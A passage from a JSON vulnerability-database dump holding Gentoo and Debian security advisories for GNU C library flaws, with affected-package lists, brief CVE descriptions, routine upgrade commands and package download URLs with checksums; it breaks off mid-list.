"Gentoo Foundation", "published": "2013-12-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "gentoo", "title": "GNU C Library: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2009-5029", "CVE-2011-0536", "CVE-2011-1089"], "modified": "2013-12-03T00:00:00", "id": "GLSA-201312-01", "href": "https://security.gentoo.org/glsa/201312-01", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:56", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3847", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4881", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0296", "https://bugs.gentoo.org/show_bug.cgi?id=325555", "https://bugs.gentoo.org/show_bug.cgi?id=285818", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3856", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4880", "https://bugs.gentoo.org/show_bug.cgi?id=341755", "https://bugs.gentoo.org/show_bug.cgi?id=330923", "https://bugs.gentoo.org/show_bug.cgi?id=335871"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.11.2-r3", "packageName": "sys-libs/glibc", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities were found in glibc, amongst others the widely-known recent LD_AUDIT and $ORIGIN issues. For further information please consult the CVE entries referenced below. \n\n### Impact\n\nA local attacker could execute arbitrary code as root, cause a Denial of Service, or gain privileges. Additionally, a user-assisted remote attacker could cause the execution of arbitrary code, and a context-dependent attacker could cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll GNU C library users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.11.2-r3\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2010-11-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "gentoo", "title": "GNU C library: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2009-4880", "CVE-2010-3847"], "modified": "2010-11-15T00:00:00", "id": "GLSA-201011-01", "href": "https://security.gentoo.org/glsa/201011-01", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:09", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-powerpc_2.7-18lenny4_all.deb", "packageName": "libc6-dev-powerpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-ppc64_2.7-18lenny4_all.deb", "packageName": "libc6-dev-ppc64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libnss-files-udeb_2.7-18lenny4_all.deb", "packageName": "libnss-files-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-ppc64_2.7-18lenny4_all.deb", "packageName": "libc6-ppc64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-i686_2.7-18lenny4_all.deb", "packageName": "libc6-i686", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3_2.7-18lenny4_all.deb", "packageName": "libc0.3", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libnss-dns-udeb_2.7-18lenny4_all.deb", "packageName": "libnss-dns-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3-udeb_2.7-18lenny4_all.deb", "packageName": "libc0.3-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-s390x_2.7-18lenny4_all.deb", "packageName": "libc6-dev-s390x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-dev_2.7-18lenny4_all.deb", "packageName": "libc0.1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-pic_2.7-18lenny4_all.deb", "packageName": "libc6.1-pic", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-dev_2.7-18lenny4_all.deb", "packageName": "libc6.1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "glibc-source_2.7-18lenny4_all.deb", "packageName": "glibc-source", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-s390x_2.7-18lenny4_all.deb", "packageName": "libc6-s390x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-pic_2.7-18lenny4_all.deb", "packageName": "libc0.1-pic", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev_2.7-18lenny4_all.deb", "packageName": "libc6-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-mips64_2.7-18lenny4_all.deb", "packageName": "libc6-mips64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-mipsn32_2.7-18lenny4_all.deb", "packageName": "libc6-dev-mipsn32", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-mips64_2.7-18lenny4_all.deb", "packageName": "libc6-dev-mips64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "locales-all_2.7-18lenny4_all.deb", "packageName": "locales-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-sparcv9b_2.7-18lenny4_all.deb", "packageName": "libc6-sparcv9b", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6_2.7-18lenny4_all.deb", "packageName": "libc6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-dev-i386_2.7-18lenny4_all.deb", "packageName": "libc0.1-dev-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3-pic_2.7-18lenny4_all.deb", "packageName": "libc0.3-pic", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-pic_2.7-18lenny4_all.deb", "packageName": "libc6-pic", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-sparc64_2.7-18lenny4_all.deb", "packageName": "libc6-sparc64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-udeb_2.7-18lenny4_all.deb", "packageName": "libc6-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-udeb_2.7-18lenny4_all.deb", "packageName": "libc6.1-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3-prof_2.7-18lenny4_all.deb", "packageName": "libc0.3-prof", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-powerpc_2.7-18lenny4_all.deb", "packageName": "libc6-powerpc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-alphaev67_2.7-18lenny4_all.deb", "packageName": "libc6.1-alphaev67", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-amd64_2.7-18lenny4_all.deb", "packageName": "libc6-dev-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-amd64_2.7-18lenny4_all.deb", "packageName": "libc6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3-dev_2.7-18lenny4_all.deb", "packageName": "libc0.3-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1_2.7-18lenny4_all.deb", "packageName": "libc6.1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.3-dbg_2.7-18lenny4_all.deb", "packageName": "libc0.3-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-i386_2.7-18lenny4_all.deb", "packageName": "libc6-dev-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-dbg_2.7-18lenny4_all.deb", "packageName": "libc6.1-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-i386_2.7-18lenny4_all.deb", "packageName": "libc6-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "glibc_2.7-18lenny4_all.deb", "packageName": "glibc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-dbg_2.7-18lenny4_all.deb", "packageName": "libc0.1-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-prof_2.7-18lenny4_all.deb", "packageName": "libc6-prof", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "nscd_2.7-18lenny4_all.deb", "packageName": "nscd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-i686_2.7-18lenny4_all.deb", "packageName": "libc0.1-i686", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-mipsn32_2.7-18lenny4_all.deb", "packageName": "libc6-mipsn32", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-prof_2.7-18lenny4_all.deb", "packageName": "libc0.1-prof", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "locales_2.7-18lenny4_all.deb", "packageName": "locales", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-xen_2.7-18lenny4_all.deb", "packageName": "libc6-xen", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-i386_2.7-18lenny4_all.deb", "packageName": "libc0.1-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dev-sparc64_2.7-18lenny4_all.deb", "packageName": "libc6-dev-sparc64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6.1-prof_2.7-18lenny4_all.deb", "packageName": "libc6.1-prof", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "glibc-doc_2.7-18lenny4_all.deb", "packageName": "glibc-doc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc6-dbg_2.7-18lenny4_all.deb", "packageName": "libc6-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1_2.7-18lenny4_all.deb", "packageName": "libc0.1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.7-18lenny4", "arch": "all", "packageFilename": "libc0.1-udeb_2.7-18lenny4_all.deb", "packageName": "libc0.1-udeb", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2058-1 security@debian.org\nhttp://www.debian.org/security/ Aurelien Jarno\nJune 10, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc, eglibc\nVulnerability : multiple \nProblem type : remote (local)\nDebian-specific: no\nCVE Id(s) : CVE-2008-1391 CVE-2009-4880, CVE-2009-4881\n CVE-2010-0296 CVE-2010-0830\nDebian Bug : 583908\n\nSeveral vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures \nproject identifies the following problems:\n\n\nCVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n\nMaksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon family of \nfunctions. If a user or automated system were tricked into \nprocessing a specially crafted format string, a remote attacker \ncould crash applications, leading to a denial of service.\n\n\nCVE-2010-0296\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If\na local attacker were able to inject newlines into a mount entry \nthrough other vulnerable mount helpers, they could disrupt the \nsystem or possibly gain root privileges.\n\n\nCVE-2010-0830\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a \nremote attacker could execute arbitrary code with user privileges.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.7-18lenny4 of the glibc package.\n\nFor the testing distribution (squeeze), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems has been fixed in\nversion 2.1.11-1 of the eglibc package.\n\nWe recommend that you upgrade your glibc or eglibc packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny4.diff.gz\n Size/MD5 checksum: 749289 dcb022bd274969ef458933d45b06cca8\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7.orig.tar.gz\n Size/MD5 checksum: 15386750 8816fbab13a072c0ccef6640c9d20833\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny4.dsc\n Size/MD5 checksum: 2564 f5b705bcda1bc7674aa33fb07f417f98\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc-source_2.7-18lenny4_all.deb\n Size/MD5 checksum: 16007014 fd3b316ef085ea9ce71dc67fefd92dc0\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.7-18lenny4_all.deb\n Size/MD5 checksum: 4488186 b9beabe612fbfb014faadef6543e7fab\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.7-18lenny4_all.deb\n Size/MD5 checksum: 1629166 da396340195ba0214d1d7827ed225341\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 1769494 7082c894a96d6fdc009e15c7773c3108\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 5716658 7ab5b5510afdbeb0e20ccc2ae1df1778\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 18210 e65e4f7d9f55c3e6974fe2112ed076a2\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 3029160 d05c22d8263423dbc334a60c04acec89\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 10600 c6af958e690622f8a204ed1401f44ce9\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 5184660 a1f37830cb0ae5ee79bf479cc92094e4\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 2491830 e3e70cb621bd954acb41700e7fb00fba\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 177484 c350540ea1beb15e5a49b39a72a4d230\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-alphaev67_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 1621366 d77b66d4fa5900d12a756c808d61ce5d\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 2787424 6f6d688cc842bd300026c5dd419eeb4f\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 1264256 0e6f61da8287a1be45e8f40f659d4200\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1460218 4dac6728d0871d40df88dde09416ee53\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 2666642 e7e12628c095b56bc66bd1fbb7bb9a1a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 3777974 3a08b45214739c18109aa80ee3957c5c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 5330838 02ca70069fe3c8186d5b15add9979a31\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 4961058 f6bc2c4255027b03177a96b48a996e95\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1930754 5da596cd4e30c190e635a1a5df518dc3\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 9420 64592a07de5985508ffd227334dedf6a\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 174984 ae190a5aa0266289018cf4beb2a9d2c1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 2497244 19d1cb7764663e2a4a40099f446c9821\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1465692 37f18d20c182623bcc4d6243b87bce01\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 18310 4402c007e74d12c5bb9a76f34d3d9e01\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 1106390 bee92ec4cb4c6b41d27e0dd5fe7c729b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 14570 0026ea37fbcdf9fa17222cbc242cc603\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 2318296 b46a306ef0c8d2ddc11ad7c64140b92e\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 2605208 9dc14baa617ba8bc86bcc5ce8ae52d9d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 1026072 9b075e76c05af156533c59c519143da3\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 5076094 06eb33e2cc52f04919d500520b1e5af7\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 172416 5a5b3848ad34faccefece22ffd9379c7\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 1323960 8164796dcc2838f364958c4e65ceb077\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 4801574 e0ccb2317094ba28772dd70b72e6ae3f\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 8406 20fe23561274294f4be4900cdc431088\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 1779106 c0242bc449f2f4defab3eed9b0b31fd2\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 5116350 ed5ceee3e916439b534ddb23fbc2ab91\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 1895344 07b2893a5fa7aed15561e410bd93f783\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 1085156 3157d36d0376d692baa7ab00e3c6c1dd\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 2715326 0f3ebf286794d696b30d3d0b9d56004b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 1394808 9a074d23294dbe9b9e22f876b6c08ec1\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 171346 c4448e74dfa19735ed94658d3744f2f9\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 8158 e2264930a0aea372106a0671cea6a40a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 2433932 9dae6f6e8ec2d493080aa4974e4315df\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 4868196 d06b1acfd00c3af245f72c66d783a0f6\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 14554 5b61be5f99c9187d6824c280320abaf0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 18530 4e2027a635625f7d44b35e92d1b97975\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 1959090 a29d92db6c7452bcb6f23f6ca5152318\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 5946144 a3bf8abc9280a74360567c0ce6de1fc1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 1120558 3f07b7f229d5be460c27ba24dbced23b\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 9744 4cef21fdb76ff503717b148a3cc7c9bd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 2482508 42d7c830f524cd72e5a5c63260518a25\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 1471474 12383490d2304d3081b68792fbc6d953\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 2804918 957d741d58375a8279d9bf1ce5e767ec\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 5106022 27112fe1d8a4efd12b01f80b52b1cfac\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 179262 6f7b3d7df37600d2473b9e741194e8a7\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 171844 ba99da60d21b46531cf5a9efc06e4526\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 823832 185aeb3599a787317757f2a669d38668\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 4550320 b601d6184daca73e71c069dbbec18e3b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1154430 8db3712e4227cdb7b93942484eb71cb1\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 8686 7b75f9cb36a35f3731c879db4b3f1886\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1267282 e68152a3929f76782ab9198fb8fbff85\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 3387248 9cdb8401cead8afdd9f3e5da7bf673f8\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 2757192 0fa3be55609c6194d44fb6fd43239b6a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1271974 22b0780c2d4a4d4ae933f445e0593759\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 4141064 81f89eabeaa6bf6fbf308fccc08398fd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1439560 5d6dfc14194c12ff9f32370c90b820d4\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 5227630 2a291ce43133a023c62ded8981d7e7c1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 2013794 606bef244b7fd348000fcd4664afe1eb\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 15430 b2bab9ce9e5cd7d522a35ef7c4833576\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 2669336 ea49adaffc0d38c758cd51ddbdf4ac2b\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 1382700 f4624d9da473c05df2af96b21beca23a\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 5631150 20c99e91f17e0807eea7a9105c967c74\n 